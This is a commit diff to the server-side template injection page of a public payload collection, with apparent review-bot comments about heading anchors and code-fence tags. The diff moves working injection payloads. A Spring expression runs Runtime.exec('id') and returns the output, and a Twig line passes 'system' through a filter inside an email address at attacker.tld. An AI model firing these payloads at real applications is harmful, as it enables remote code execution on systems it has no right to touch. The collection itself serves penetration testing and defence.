mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Update README.md
parent
b672771a1b
commit
996c83bb4b
@ -72,7 +72,8 @@
|
|||||||
- [Twig - Template format](#twig---template-format)
|
- [Twig - Template format](#twig---template-format)
|
||||||
- [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
|
- [Twig - Arbitrary File Reading](#twig---arbitrary-file-reading)
|
||||||
- [Twig - Code execution](#twig---code-execution)
|
- [Twig - Code execution](#twig---code-execution)
|
||||||
- [Java - Velocity](#velocity)
|
- [Java - Velocity](#java---velocity)
|
||||||
|
- [Java - Spring](#java---spring)
|
||||||
- [PHP - patTemplate](#pattemplate)
|
- [PHP - patTemplate](#pattemplate)
|
||||||
- [PHP - PHPlib](#phplib-and-html_template_phplib)
|
- [PHP - PHPlib](#phplib-and-html_template_phplib)
|
||||||
- [PHP - Plates](#plates)
|
- [PHP - Plates](#plates)
|
||||||
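Review bot: the two Java entries now link to prefixed anchors (`#java---velocity`, `#java---spring`) while the PHP entries directly below keep unprefixed ones (`#pattemplate`, `#plates`) under "PHP - ..." labels, so the table of contents ends up mixing two anchor conventions. Either rename the PHP headings the same way in this change or record it as a follow-up. It is also worth confirming in a rendered preview that both new anchors resolve to the `## Java - Velocity` and `## Java - Spring` headings introduced further down, since a mismatched anchor fails silently.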
@ -879,15 +880,6 @@ Execute code using SSTI for Slim engine.
|
|||||||
|
|
||||||
---
|
---
|
||||||
|
|
||||||
## Spring Framework (Java)
|
|
||||||
|
|
||||||
```
|
|
||||||
*{7*7}
|
|
||||||
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
|
|
||||||
```
|
|
||||||
|
|
||||||
---
|
|
||||||
|
|
||||||
## Twig
|
## Twig
|
||||||
|
|
||||||
[Official website](https://twig.symfony.com/)
|
[Official website](https://twig.symfony.com/)
|
||||||
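Review bot: removing `## Spring Framework (Java)` at this position drops the old heading and its anchor, and nothing in the change says the section is relocated rather than deleted; the commit message "Update README.md" should state that the block moves next to Velocity under the new name. Existing deep links to the old heading will stop resolving, so search the repository for references to it before merging.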
@ -953,7 +945,7 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
|
|||||||
|
|
||||||
---
|
---
|
||||||
|
|
||||||
## Velocity
|
## Java - Velocity
|
||||||
|
|
||||||
[Official website](https://velocity.apache.org/engine/1.7/user-guide.html)
|
[Official website](https://velocity.apache.org/engine/1.7/user-guide.html)
|
||||||
> Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code.
|
> Velocity is a Java-based template engine. It permits web page designers to reference methods defined in Java code.
|
||||||
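Review bot: renaming the heading to `## Java - Velocity` retires the `#velocity` anchor that the table of contents used until this commit, so any other file or external page linking to `#velocity` will land at the top of the document instead of this section. Check for remaining in-repo links to the old anchor and update them in the same change.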
@ -971,6 +963,16 @@ $str.valueOf($chr.toChars($out.read()))
|
|||||||
|
|
||||||
---
|
---
|
||||||
|
|
||||||
|
|
||||||
|
## Java - Spring
|
||||||
|
|
||||||
|
```python
|
||||||
|
*{7*7}
|
||||||
|
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## patTemplate
|
## patTemplate
|
||||||
|
|
||||||
> [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts
|
> [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts
|
||||||
|
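Review bot: the fence opening the re-added `## Java - Spring` block is tagged `python`, but the two lines inside it are Spring expressions with Java type references (`T(java.lang.Runtime)`), and the block was untagged in its previous location; use `java` or leave the fence untagged so highlighting does not mislabel the content. The section also arrives without the "Official website" link and one-line description that the neighbouring Twig and Velocity sections carry, so a reader gets no indication of which Spring component evaluates `*{...}`; adding those two lines would bring it in line with the rest of the file.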